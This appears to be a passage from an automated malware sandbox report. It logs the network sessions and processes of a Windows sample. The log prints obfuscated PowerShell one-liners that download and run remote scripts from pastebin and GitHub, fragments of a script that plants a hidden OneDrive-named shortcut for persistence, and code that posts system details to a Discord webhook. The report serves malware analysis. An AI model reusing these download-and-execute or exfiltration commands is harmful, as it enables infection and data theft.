                                                                                        2024-10-15 13:54:30 UTC | 217 | OUT | Data Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 2a 2a 61 6c 62 75 73 2a 2a 20 68 61 73 20 6a 6f 69 6e 65 64 20 2d 20 63 72 7a 63 72 70 74 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 59 38 57 4d 31 39 36 4d 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 22 0d 0a 7d
                                                                                        Data Ascii: { "content": "**user** has joined - crzcrpt\n----------------------------------\n**GPU:** Y8WM196M\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4"}
                                                                                        2024-10-15 13:54:30 UTC | 1255 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Tue, 15 Oct 2024 13:54:30 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 45
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                        x-ratelimit-limit: 5
                                                                                        x-ratelimit-remaining: 4
                                                                                        x-ratelimit-reset: 1729000471
                                                                                        x-ratelimit-reset-after: 1
                                                                                        via: 1.1 google
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fv34Bm0hZ7hp6mBEyYE%2FiN25d%2BPcp9UNScYkru13Bj7kXmAJuQezDRWwHiwynJLOYJb3LvUa12F0Xpn9FGaOB3oF0dsXL1QktYE2vklRgfn4XFknCGnjyNB9Dc1n"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Set-Cookie: __cfruid=28b32a450ff2bac380e830d167c0604ce7a5a202-1729000470; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                        Set-Cookie: _cfuvid=lQe0Iw2OKxzgySPaR37b46io8PxLRVd4alq_N7AH9uM-1729000470457-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d304d2bba08a916-DFW
                                                                                        2024-10-15 13:54:30 UTC | 45 | IN | Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                        Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                        Session ID: 2 | Source IP: 192.168.2.12 | Source Port: 55614 | Destination IP: 104.20.4.235 | Destination Port: 443 | PID: 6988 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-10-15 13:54:31 UTC | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                        Host: pastebin.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-15 13:54:31 UTC | 397 | IN | HTTP/1.1 200 OK
                                                                                        Date: Tue, 15 Oct 2024 13:54:31 GMT
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        x-frame-options: DENY
                                                                                        x-content-type-options: nosniff
                                                                                        x-xss-protection: 1;mode=block
                                                                                        cache-control: public, max-age=1801
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 121
                                                                                        Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d304d332937315f-DFW
                                                                                        2024-10-15 13:54:31 UTC | 139 | IN | Data Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                                        Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                                        2024-10-15 13:54:31 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session ID: 3 | Source IP: 192.168.2.12 | Source Port: 55617 | Destination IP: 185.199.109.133 | Destination Port: 443 | PID: 6988 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-10-15 13:54:32 UTC | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                        Host: raw.githubusercontent.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-15 13:54:33 UTC | 902 | IN | HTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        Content-Length: 7508
                                                                                        Cache-Control: max-age=300
                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-Frame-Options: deny
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                                        Accept-Ranges: bytes
                                                                                        Date: Tue, 15 Oct 2024 13:54:33 GMT
                                                                                        Via: 1.1 varnish
                                                                                        X-Served-By: cache-dfw-kdal2120028-DFW
                                                                                        X-Cache: HIT
                                                                                        X-Cache-Hits: 1
                                                                                        X-Timer: S1729000473.010229,VS0,VE1
                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        X-Fastly-Request-ID: 700cbc9ef1697c4bb09e678b2830abba1cba0869
                                                                                        Expires: Tue, 15 Oct 2024 13:59:33 GMT
                                                                                        Source-Age: 120
                                                                                        2024-10-15 13:54:33 UTC | 1378 | IN | Data Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                                        Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                                        2024-10-15 13:54:33 UTC | 1378 | IN | Data Ascii: (decimal byte-array literal, omitted)
                                                                                        2024-10-15 13:54:33 UTC | 1378 | IN | Data Ascii: (decimal byte-array literal, omitted)
                                                                                        2024-10-15 13:54:33 UTC | 1378 | IN | Data Ascii: (decimal byte-array literal, omitted)
                                                                                        2024-10-15 13:54:33 UTC | 1378 | IN | Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors

                                                                                        # Retrieve GPU information
                                                                                        $gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                                        2024-10-15 13:54:33 UTC | 618 | IN | Data Ascii: ======================
                                                                                        "@
                                                                                        } | ConvertTo-Json

                                                                                        # Send the POST request to the webhook URL
                                                                                        try {
                                                                                            Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json"
                                                                                            Write-Output "Message sent successfully."
                                                                                        } catch {
                                                                                            W


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        4 | 192.168.2.12 | 55620 | 104.20.4.235 | 443 | 2132 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-10-15 13:54:39 UTC | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                        Host: pastebin.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-15 13:54:39 UTC | 397 | IN | HTTP/1.1 200 OK
                                                                                        Date: Tue, 15 Oct 2024 13:54:39 GMT
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        x-frame-options: DENY
                                                                                        x-content-type-options: nosniff
                                                                                        x-xss-protection: 1;mode=block
                                                                                        cache-control: public, max-age=1801
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 129
                                                                                        Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d304d62bacb3162-DFW
                                                                                        2024-10-15 13:54:39 UTC | 139 | IN | Data Ascii: 85
                                                                                        calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                                        2024-10-15 13:54:39 UTC | 5 | IN | Data Ascii: 0


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        5 | 192.168.2.12 | 55622 | 185.199.109.133 | 443 | 2132 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-10-15 13:54:40 UTC | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                        Host: raw.githubusercontent.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-15 13:54:40 UTC | 902 | IN | HTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        Content-Length: 7508
                                                                                        Cache-Control: max-age=300
                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-Frame-Options: deny
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                                        Accept-Ranges: bytes
                                                                                        Date: Tue, 15 Oct 2024 13:54:40 GMT
                                                                                        Via: 1.1 varnish
                                                                                        X-Served-By: cache-dfw-kdal2120145-DFW
                                                                                        X-Cache: HIT
                                                                                        X-Cache-Hits: 1
                                                                                        X-Timer: S1729000481.551160,VS0,VE1
                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        X-Fastly-Request-ID: 0d0643507043e3efc0a9408d7f9a82424c9988d7
                                                                                        Expires: Tue, 15 Oct 2024 13:59:40 GMT
                                                                                        Source-Age: 128
                                                                                        2024-10-15 13:54:40 UTC | 1378 | IN | Data Ascii: sleep 5
                                                                                        rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Force
                                                                                        sleep 5


                                                                                        $googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                                        if (-Not (Test-Path $googoogaagaa)) {
                                                                                        rm $env:tmp\onedrivefilesync.dll -force
                                                                                        New-ItemPropert
                                                                                        2024-10-15 13:54:40 UTC | 1378 | IN | Data Ascii: (decimal byte-array literal, omitted)
                                                                                        2024-10-15 13:54:40 UTC | 1378 | IN | Data Ascii: (decimal byte-array literal, omitted)
                                                                                        2024-10-15 13:54:40 UTC | 1378 | IN | Data Ascii: (decimal byte-array literal, omitted)
                                                                                        2024-10-15 13:54:40 UTC | 1378 | IN | Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors

                                                                                        # Retrieve GPU information
                                                                                        $gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                                        2024-10-15 13:54:40 UTC | 618 | IN | Data Ascii: ======================
                                                                                        "@
                                                                                        } | ConvertTo-Json

                                                                                        # Send the POST request to the webhook URL
                                                                                        try {
                                                                                            Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json"
                                                                                            Write-Output "Message sent successfully."
                                                                                        } catch {
                                                                                            W


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        6 | 192.168.2.12 | 55624 | 162.159.138.232 | 443 | 6988 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-10-15 13:54:46 UTC | 311 | OUT | POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                        Content-Type: application/json
                                                                                        Host: discord.com
                                                                                        Content-Length: 298
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-15 13:54:46 UTC | 298 | OUT | Data Ascii: {
                                                                                            "content":  "================================\n**user** system online\n\n**GPU:** Y8WM196M\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                                                        2024-10-15 13:54:46 UTC | 1354 | IN | HTTP/1.1 204 No Content
                                                                                        Date: Tue, 15 Oct 2024 13:54:46 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Connection: close
                                                                                        set-cookie: __dcfduid=099632648afd11efaf228654655dbc7f; Expires=Sun, 14-Oct-2029 13:54:46 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                        x-ratelimit-limit: 5
                                                                                        x-ratelimit-remaining: 4
                                                                                        x-ratelimit-reset: 1729000487
                                                                                        x-ratelimit-reset-after: 1
                                                                                        via: 1.1 google
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T6pTq1xNqWjXMvEGdbcjNp8LWw8tY7X13%2FTofPwgfSM4Vk4u424%2ByFXHQ2QZW9IDZ2JQdZRPfAqGzqrVh%2FxoG9R9JESt7eWfv2NexidiXiSL0HzT3o4W9havNssK"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                        Set-Cookie: __sdcfduid=099632648afd11efaf228654655dbc7fe4597326f086f5b974e563a9e8416bb65678cdd39beaf78d0de9e02a3394fe79; Expires=Sun, 14-Oct-2029 13:54:46 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                        Set-Cookie: __cfruid=c45d93973f57df3fe6a9384402a2e200cd25d6b6-1729000486; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                        2024-10-15 13:54:46 UTC | 211 | IN | Data Ascii: Set-Cookie: _cfuvid=fP4fksgZ5TbP8iiPuxevc6sHlLuGRTMwqNlEEfEJunw-1729000486430-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d304d8eee85b789-DFW


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        7 | 192.168.2.12 | 55625 | 162.159.138.232 | 443 | 2132 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-10-15 13:54:53 UTC | 311 | OUT | POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                        Content-Type: application/json
                                                                                        Host: discord.com
                                                                                        Content-Length: 298
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-15 13:54:53 UTC | 298 | OUT | Data Ascii: {
                                                                                            "content":  "================================\n**user** system online\n\n**GPU:** Y8WM196M\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC -
                                                                                        2024-10-15 13:54:53 UTC | 1362 | IN | HTTP/1.1 204 No Content
                                                                                        Date: Tue, 15 Oct 2024 13:54:53 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Connection: close
                                                                                        set-cookie: __dcfduid=0dff71bc8afd11efb78f5a0b7cdadbe5; Expires=Sun, 14-Oct-2029 13:54:53 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                        x-ratelimit-limit: 5
                                                                                        x-ratelimit-remaining: 4
                                                                                        x-ratelimit-reset: 1729000495
                                                                                        x-ratelimit-reset-after: 1
                                                                                        via: 1.1 google
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r%2BtamlFDgru%2BHTMFpAWSrLFXQxRzBOsIVVxCaHKuTVJswd4y6v13rpOI3Tuyf%2BSpiHXhKbgAmbd%2BhE3V0EdmIABIKEY%2FemwrdmeYMdEFo3%2Fgk7TDAM6pM1pxYJ9%2B"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                        Set-Cookie: __sdcfduid=0dff71bc8afd11efb78f5a0b7cdadbe5f0c5e5463bbf42c9140ab04d1eb149e818cc5f5b480459e83337102f9913a58e; Expires=Sun, 14-Oct-2029 13:54:53 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                        Set-Cookie: __cfruid=9e43351992f43fb9b9dcdcf6b225e7c6aadf5de6-1729000493; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                        2024-10-15 13:54:53 UTC211IN
                                                                                        Data Ascii: Set-Cookie: _cfuvid=wwJ2sc616g1FpAaxF2bmEwrGVneUUnHsP7PDYIMZWXo-1729000493817-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d304dbd4adee901-DFW


                                                                                        Target ID:0
                                                                                        Start time:09:54:04
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Users\user\Desktop\OSLdZanXNc.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\Desktop\OSLdZanXNc.exe"
                                                                                        Imagebase:0x7ff674c50000
                                                                                        File size:45'568 bytes
                                                                                        MD5 hash:98FF253F6F854DF7B7F6794A2761DBD1
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:1
                                                                                        Start time:09:54:04
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff704000000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:09:54:05
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}
                                                                                        Imagebase:0x7ff63c0a0000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:09:54:07
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)
                                                                                        Imagebase:0x7ff63c0a0000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:09:54:07
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff704000000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:8
                                                                                        Start time:09:54:26
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Windows\System32\attrib.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                                        Imagebase:0x7ff7cac60000
                                                                                        File size:23'040 bytes
                                                                                        MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:9
                                                                                        Start time:09:54:28
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Windows\System32\forfiles.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                                        Imagebase:0x7ff7d53d0000
                                                                                        File size:52'224 bytes
                                                                                        MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:10
                                                                                        Start time:09:54:28
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff704000000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:11
                                                                                        Start time:09:54:28
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                                        Imagebase:0x7ff63c0a0000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:12
                                                                                        Start time:09:54:29
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                                        Imagebase:0x7ff63c0a0000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:13
                                                                                        Start time:09:54:35
                                                                                        Start date:15/10/2024
                                                                                        Path:C:\Windows\System32\forfiles.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                                        Imagebase:0x7ff7d53d0000
                                                                                        File size:52'224 bytes
                                                                                        MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
